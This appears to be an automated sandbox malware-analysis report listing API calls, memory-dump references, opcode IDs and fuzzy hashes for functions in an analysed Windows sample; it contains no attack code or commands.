                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA
                                                              • GdipCreateBitmapFromStream.GDIPLUS(?,?), ref: 0089A3E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: BitmapCreateFromGdipStream
                                                              • String ID:
                                                              • API String ID: 1918208029-0
                                                              • Opcode ID: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
                                                              • Instruction ID: 206e326ee75c50847ef7a0edef576adfca72f97ac56ef8f5e6d96f60239a0681
                                                              • Opcode Fuzzy Hash: fe9e487c1ce3c18a641265baf1a5c3744cd87d548c011b96ca4c60969fa00cc6
                                                              • Instruction Fuzzy Hash: 06E0ED71500218EBCB14EF99C5417A9BBE8FB04364F24C05AA846E3301E774AE04DB92
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008A2BAA
                                                              • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 008A2BB5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: Value___vcrt____vcrt_uninitialize_ptd
                                                              • String ID:
                                                              • API String ID: 1660781231-0
                                                              • Opcode ID: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
                                                              • Instruction ID: 0fa7643553d242cde732b7cd3eaa09174968f641aeb8551d4cf18846377d1123
                                                              • Opcode Fuzzy Hash: 52754cb5ef039c194090b1fba73e92bb41ab13bdc5bc6b3b0ef91246af8615e6
                                                              • Instruction Fuzzy Hash: 50D0A934294214DB7C347A7C29025882349FE53B747A053CAF431D5DC1EE189042A032
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: ItemShowWindow
                                                              • String ID:
                                                              • API String ID: 3351165006-0
                                                              • Opcode ID: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
                                                              • Instruction ID: 355139224975fc97c531ae3b6ff7ada7ecb77dc992a3c37ee2e9649771753714
                                                              • Opcode Fuzzy Hash: c43497c8fb3f333143ad1fcd7bfd1a863f6384fdef2f12bfc4e7d6a48a1ad835
                                                              • Instruction Fuzzy Hash: 71C0123205C280BECB020BB4DC0DC2BBBA8BBA5312F04C90CB0B5C2060C238CA10DB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
                                                              • Instruction ID: e8bd0d1a5e14cb3672a960d7c5fdefcf2dca8f952a5812d27c87ac5d958d6d92
                                                              • Opcode Fuzzy Hash: ad737915ae8722737d3c8a24d1410e6879a9eac55db7501e4463be4a93be3366
                                                              • Instruction Fuzzy Hash: 5BC18070A002549FEF15EF68C498BA97BAAFF15320F0805B9EC45DB396DF309946CB61
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
                                                              • Instruction ID: aacbf592e65901a2934b6a4e72866bb4481f6bd8df9249414931b48d163deba1
                                                              • Opcode Fuzzy Hash: e5bcf4d6e1d2db3892add95a8b3fa606e60fe0cfd99974458118088e8523ef53
                                                              • Instruction Fuzzy Hash: C871C071540F449EDB35EB74C8459E7B7E9FB14700F40092EE2ABC7642DA326A88DF12
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00888289
                                                                • Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 0088A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog$CloseFind
                                                              • String ID:
                                                              • API String ID: 2506663941-0
                                                              • Opcode ID: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
                                                              • Instruction ID: 340d058e70b1f4bd7150e4b3aa8172507329068448bb8d62d086b1da485c046d
                                                              • Opcode Fuzzy Hash: f36b23627c6e8992969b79a7ebe89c1fa71b24f6372e601338af62d09fa3829a
                                                              • Instruction Fuzzy Hash: CA4195719446589ADB24FBA4CC55AEAB368FF10304F4404EAE18AE7183EF755E85CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C
                                                                • Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
                                                              • Instruction ID: 005fb82f1e741aad7c4fe1e15f16d7485f74b228de14834446924e9b60a956ca
                                                              • Opcode Fuzzy Hash: 24adb285eb43ccea63aa3fa3b8f84febb5e5ba828e2eb3eae76219a21f00ae1b
                                                              • Instruction Fuzzy Hash: 224149B0905B409EE724DF798885AE6FBE5FF18310F54492ED5EEC3282CB316654CB15
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 008813E1
                                                                • Part of subcall function 00885E37: __EH_prolog.LIBCMT ref: 00885E3C
                                                                • Part of subcall function 0088CE40: __EH_prolog.LIBCMT ref: 0088CE45
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
                                                              • Instruction ID: f4f997a682e335aff79cf6bb3783ec1d0fe939b916b0cb24b4429cfa4101f4e5
                                                              • Opcode Fuzzy Hash: 09269a717e6475dbcc3b2b6f15979d1dfc0f00f6ef3544c37ad900273fce02f5
                                                              • Instruction Fuzzy Hash: 234136B0905B409EEB24EF798885AE6FBE5FF19310F54492ED5EEC3282CB316654CB11
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 0089B098
                                                                • Part of subcall function 008813DC: __EH_prolog.LIBCMT ref: 008813E1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
                                                              • Instruction ID: 4d833bacea639e693aa63534bcd8cd73df88babdf9e9dc403714a45aeff15654
                                                              • Opcode Fuzzy Hash: 3141a3a6f27b63fea9c98cd45e8b709a78300cd8e72c594b3f331e2f6daede53
                                                              • Instruction Fuzzy Hash: 11318A71800249EACF15EFA8D9519EEBBB8FF19304F14449AE409F3242DB35AE058B62
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,008B3A34), ref: 008AACF8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
                                                              • Instruction ID: b9939f708dc3347890fd34d70bf9dcf5f52a003e2133ab4aa724d841b1bc40f7
                                                              • Opcode Fuzzy Hash: 0cba31536110b88c72d48250caf81d3f54aa64e654600f2610719b4cbc62a80e
                                                              • Instruction Fuzzy Hash: 6511A333A006296FBB3A9E2CEC449AA7395FB863747164220ED55EBE54DB34DC01C7D2
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
                                                              • Instruction ID: 381004aa9ac06037743ef541c4a9ab6b0eb165db203c31a62be639fe0d6f4d66
                                                              • Opcode Fuzzy Hash: 917cfff3723d2d63650f7e450f7b8825a90eeab92377c5511e9051752d169644
                                                              • Instruction Fuzzy Hash: C2015233900528ABCF11BBACCC859EEB736FF88750B054625E866F7252DB348D0587A1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 008AB136: RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177
                                                              • _free.LIBCMT ref: 008AC4E5
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008C5000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008E2000.00000004.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005243339.00000000008E3000.00000002.00000001.01000000.00000003.sdmp
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_880000_o9jDrpZrgR.jbxd
                                                              Similarity
                                                              • API ID: AllocateHeap_free
                                                              • String ID:
                                                              • API String ID: 614378929-0
                                                              • Opcode ID: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction ID: aadb5758a45ea9d5355617f579e8c0534d5a4709d0e09fafeba7a68a6f294ae8
                                                              • Opcode Fuzzy Hash: 7bcb57144d722b3f6fb3f884bcb86c333c53e20e4031edd189f970cc783d8b92
                                                              • Instruction Fuzzy Hash: F70126722043056BF3318E69888196AFBE8FB8A370F25051DE184C3681EA30A805C738
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000008,008B3A34,00000000,?,008A989A,00000001,00000364,?,?,?,0088D984,?,?,?,00000004,0088D710), ref: 008AB177
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
                                                              • Instruction ID: f080c40e0588083ab87ae9a5aba92a1708fc8ac0b92144c9b8e6f7bd837a3542
                                                              • Opcode Fuzzy Hash: d32c06a888da837e25e3a232769b5a2c0325e1a89760d4921af30f8e41c672ba
                                                              • Instruction Fuzzy Hash: E7F08932505569B7FB255A65AC25B5F7748FF43770B188221FC08EB992CB30DD0186E1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 008A3C3F
                                                              Similarity
                                                              • API ID: AddressProc
                                                              • String ID:
                                                              • API String ID: 190572456-0
                                                              • Opcode ID: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
                                                              • Instruction ID: d3dc49baef5e2500c1cd8ad1b54b6b5d947f8d4d780a2854b929c650b929547d
                                                              • Opcode Fuzzy Hash: 54e2bf5801ff78b56c50927d892ffb9deab014feb2e1292c5dca54aa9a9a276e
                                                              • Instruction Fuzzy Hash: AAF0E5322002169FEF119EACFC04A9A77A9FF12B307104125FA05E75D0DB31EA20C790
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(00000000,?,00000000,?,008ACA2C,00000000,?,008A6CBE,?,00000008,?,008A91E0,?,?,?), ref: 008A8E38
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
                                                              • Instruction ID: c5275b10cb48f81d49b0b04d3e91ce1cffe79c1cab5d78621dce2a004ee0c468
                                                              • Opcode Fuzzy Hash: 4580757fef041af7d1e38a9aa1ef868e620baddfdfc975e75f525d677990a680
                                                              • Instruction Fuzzy Hash: 46E0E531206125D6FB7127259C04B5F7688FB433B4F110110AC59D6C91DF21CC2086F1
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • __EH_prolog.LIBCMT ref: 00885AC2
                                                                • Part of subcall function 0088B505: __EH_prolog.LIBCMT ref: 0088B50A
                                                              Similarity
                                                              • API ID: H_prolog
                                                              • String ID:
                                                              • API String ID: 3519838083-0
                                                              • Opcode ID: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
                                                              • Instruction ID: 095d01bd50c3009e3236e421d18f0d47c32afdc248125fef3eef89a0e0c65cf4
                                                              • Opcode Fuzzy Hash: f4bc071d32b6458643b8a5060aef8c474ae8246213d13f236f606c5a653f6034
                                                              • Instruction Fuzzy Hash: 31016930810790DEDB26F7ACC0417DDBBA4EF64304F58848DA456A3282DBB42B08DBA3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • FindCloseChangeNotification.KERNELBASE(000000FF,?,?,008895D6,?,?,?,?,?,008B2641,000000FF), ref: 0088963B
                                                              Similarity
                                                              • API ID: ChangeCloseFindNotification
                                                              • String ID:
                                                              • API String ID: 2591292051-0
                                                              • Opcode ID: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
                                                              • Instruction ID: 0f982b7a99942414d6557b1b12b0de133cc8c15ac7992f6388979eb4ac89b6fd
                                                              • Opcode Fuzzy Hash: 5bf64e4a65e8c885c35693ca190e259f37901f3e592996a943eba8ebe6649fdc
                                                              • Instruction Fuzzy Hash: 75F05470485B159EDB31EA64C458BA277E8FB22325F081B1ED0E7829E0E771658D8B40
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                                • Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6C4
                                                                • Part of subcall function 0088A69B: FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6F2
                                                                • Part of subcall function 0088A69B: GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0088A592,000000FF,?,?), ref: 0088A6FE
                                                              • FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0088A598
                                                              Similarity
                                                              • API ID: Find$FileFirst$CloseErrorLast
                                                              • String ID:
                                                              • API String ID: 1464966427-0
                                                              • Opcode ID: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
                                                              • Instruction ID: c0df90654e161640dcf0b88db874755ed3abb0bc22161fbf2d66bc40f39aa8ce
                                                              • Opcode Fuzzy Hash: b2aa1137eeb2db01b04d1eea683a761dd921a7daf718b128b68937a5ab4b7959
                                                              • Instruction Fuzzy Hash: BAF05E31008790AADA6677B88904BDA7B90BF1A321F048A4AF1F9921D6C37551959B23
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SetThreadExecutionState.KERNEL32(00000001), ref: 00890E3D
                                                              Similarity
                                                              • API ID: ExecutionStateThread
                                                              • String ID:
                                                              • API String ID: 2211380416-0
                                                              • Opcode ID: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
                                                              • Instruction ID: c26d2e23fb26321e0ac88dcc8bf9f7b54f77ba514b2f493ca5b7fdb2a05f5510
                                                              • Opcode Fuzzy Hash: 7062559ef5d21689680f0731b3cb9cf5c134d26e3cd2215f2a49ab89ff7da1e9
                                                              • Instruction Fuzzy Hash: DED012116150565ADE11332C695DBFE2617FFC7321F0D0065B145D7183DE644886A263
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GdipAlloc.GDIPLUS(00000010), ref: 0089A62C
                                                                • Part of subcall function 0089A3B9: GdipCreateBitmapFromStreamICM.GDIPLUS(?,?), ref: 0089A3DA
                                                              Similarity
                                                              • API ID: Gdip$AllocBitmapCreateFromStream
                                                              • String ID:
                                                              • API String ID: 1915507550-0
                                                              • Opcode ID: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction ID: 74cf48fc3cbe844a9f2f86d826d9f80cc145e806ea89f0b593ae91c7ac582a88
                                                              • Opcode Fuzzy Hash: 04de48f4da0057d5573094f8f1391eb8b680834ec636c82e70e38579218699a2
                                                              • Instruction Fuzzy Hash: BCD0A93020020CBADF0ABB26CC0297E7ADAFB10740F088021B842E5281EBB1D910A2A3
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • DloadProtectSection.DELAYIMP ref: 0089E5E3
                                                              Similarity
                                                              • API ID: DloadProtectSection
                                                              • String ID:
                                                              • API String ID: 2203082970-0
                                                              • Opcode ID: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
                                                              • Instruction ID: 516fcd9414ad5856d14093f1fb9a5556c80b681b03ac4485082eba6ee009793f
                                                              • Opcode Fuzzy Hash: 229f8ba0e5c227c79150a778433354647b812a82303060af56d20707320231fc
                                                              • Instruction Fuzzy Hash: 2DD0C9B0580280ABDE02FBA8A88A7243B54F325B04FA80115F145D5595DA745480C606
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • SendDlgItemMessageW.USER32(0000006A,00000402,00000000,00000000,00891B3E), ref: 0089DD92
                                                                • Part of subcall function 0089B568: PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0089B579
                                                                • Part of subcall function 0089B568: GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0089B58A
                                                                • Part of subcall function 0089B568: IsDialogMessageW.USER32(0001042C,?), ref: 0089B59E
                                                                • Part of subcall function 0089B568: TranslateMessage.USER32(?), ref: 0089B5AC
                                                                • Part of subcall function 0089B568: DispatchMessageW.USER32(?), ref: 0089B5B6
                                                              Similarity
                                                              • API ID: Message$DialogDispatchItemPeekSendTranslate
                                                              • String ID:
                                                              • API String ID: 897784432-0
                                                              • Opcode ID: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
                                                              • Instruction ID: 8d92ffec57a704d754361def787ecdea6b5f4dd3c7e41d69f3afdc39585ea5a0
                                                              • Opcode Fuzzy Hash: 1b70116bf4feb822781ee60fa6a6903b0c3d448550e9af0b4e84de7043c7820b
                                                              • Instruction Fuzzy Hash: C8D09E31144300BADA023B55DE06F1A7AA2FB88B09F004555B284750B186729E21DF16
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              APIs
                                                              • GetFileType.KERNELBASE(000000FF,008897BE), ref: 008898C8
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.2005160777.0000000000881000.00000020.00000001.01000000.00000003.sdmp, Offset: 00880000, based on PE: true
                                                              • Associated: 00000000.00000002.2005149301.0000000000880000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005183638.00000000008B3000.00000002.00000001.01000000.00000003.sdmp
                                                              • Associated: 00000000.00000002.2005198800.00000000008BE000.00000004.00000001.01000000.00000003.sdmp
